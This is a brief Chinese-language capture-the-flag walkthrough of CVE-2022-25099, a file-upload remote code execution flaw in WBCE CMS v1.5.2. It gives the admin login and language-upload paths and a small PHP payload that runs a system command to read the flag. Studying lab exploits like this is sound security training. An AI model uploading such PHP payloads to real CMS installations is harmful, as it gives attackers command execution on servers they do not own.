文章目录
- CVE-2022-25099
- 一、漏洞介绍
- 二、渗透步骤
- 1、打开网站
- 2、登录后台
- 3、文件上传
- 4、查看flag值
CVE-2022-25099
一、漏洞介绍
WBCE CMS v1.5.2 RCE。
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE。
二、渗透步骤
1、打开网站
http://eci-2ze7fpf1p0c80h0i7ayq.cloudeci1.ichunqiu.com/
2、登录后台
http://eci-2ze7fpf1p0c80h0i7ayq.cloudeci1.ichunqiu.com/admin/login/index.php
3、文件上传
http://eci-2ze7fpf1p0c80h0i7ayq.cloudeci1.ichunqiu.com/admin/languages/index.php
<?php
system('cat /flag');
phpinfo();
?>
4、查看flag值
http://eci-2ze7fpf1p0c80h0i7ayq.cloudeci1.ichunqiu.com/admin/languages/install.php
